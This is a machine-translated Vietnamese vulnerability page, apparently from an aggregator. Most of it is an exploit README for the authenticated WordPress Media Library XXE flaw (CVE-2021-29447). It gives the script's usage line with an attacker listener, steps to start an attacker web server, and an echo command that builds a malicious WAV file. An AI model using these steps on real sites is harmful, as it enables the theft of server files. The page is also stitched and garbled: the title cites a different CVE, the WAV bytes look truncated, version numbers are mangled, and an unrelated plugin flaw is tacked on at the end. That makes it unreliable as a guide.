WordPress CVE-2022-29447

Tất cả thông tin có trong cơ sở dữ liệu này được cung cấp bởi Wordfence Intelligence.
Bạn muốn tích hợp dữ liệu này vào nền tảng hoặc mạng của mình?
Liên hệ với chúng tôi ngay bây giờ để thảo luận về quyền truy cập API vào Nguồn cấp dữ liệu thông minh Wordfence của chúng tôi.

hỏi ngay

Khai thác WordPress Media Library XML đã xác thực External Entity Injection [XXE] để trích xuất các tệp

Đã vá trong WordPress 5. 7. 1

Yêu cầu thông tin đăng nhập WordPress hợp lệ để tương tác với Thư viện phương tiện

Cách sử dụng

python3 wordpress-cve-2021-29447.py -l //LOCAL_IP:PORT -r //WORDPRESS_URL -u USERNAME -p PASSWORD

Tập lệnh sẽ yêu cầu đường dẫn tệp và trả về tệp được yêu cầu

Tín dụng

Lấy cảm hứng từ tập lệnh ExploitDB của David Utón [M3n0sD0n4ld]

từ chối trách nhiệm

Việc sử dụng điều này để tấn công các mục tiêu mà không có sự đồng ý trước của cả hai bên là bất hợp pháp. Người dùng cuối có trách nhiệm tuân thủ tất cả các luật hiện hành của địa phương, tiểu bang và liên bang. Các nhà phát triển không chịu trách nhiệm pháp lý và không chịu trách nhiệm cho bất kỳ sự lạm dụng hoặc thiệt hại nào do chương trình này gây ra. Chỉ sử dụng cho mục đích giáo dục

wordpress 5. 6-5. 7 - Đã xác thực [Tác giả+] XXE [CVE-2021-29447]

sử dụng

Bước 1. Chạy WordPress

$ make up-wp

Bước 2. Chạy máy chủ web Attacker

$ make up-mal

Bước 3. Tạo tệp WAV độc hại

Không có npm wavefile [Khuyến nghị]

$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00\x00'> malicious.wav

Với tệp sóng npm

$ make make-wav

Bước 4. Đăng nhập vào WordPress & Tải tệp WAV lên Phương tiện Mới

Bước5. giải mã

Người giới thiệu

  • wordpress 5. 6-5. 7 - XXE được xác thực trong Thư viện phương tiện ảnh hưởng đến lỗ hổng bảo mật PHP 8

Wordpress là một CMS mã nguồn mở. Người dùng có khả năng tải tệp lên [như Tác giả] có thể khai thác sự cố phân tích cú pháp XML trong Thư viện phương tiện dẫn đến các cuộc tấn công XXE. Điều này yêu cầu cài đặt WordPress đang sử dụng PHP 8. Có thể truy cập vào các tệp nội bộ trong một cuộc tấn công XXE thành công. Điều này đã được vá trong phiên bản WordPress 5. 7. 1, cùng với các phiên bản cũ hơn bị ảnh hưởng thông qua một bản phát hành nhỏ. Chúng tôi thực sự khuyên bạn nên bật cập nhật tự động

Lỗ hổng được xác thực [quản trị viên hoặc vai trò người dùng cao hơn] Bao gồm tệp cục bộ [LFI] trong plugin Hover Effects của Wow-Company

Chủ Đề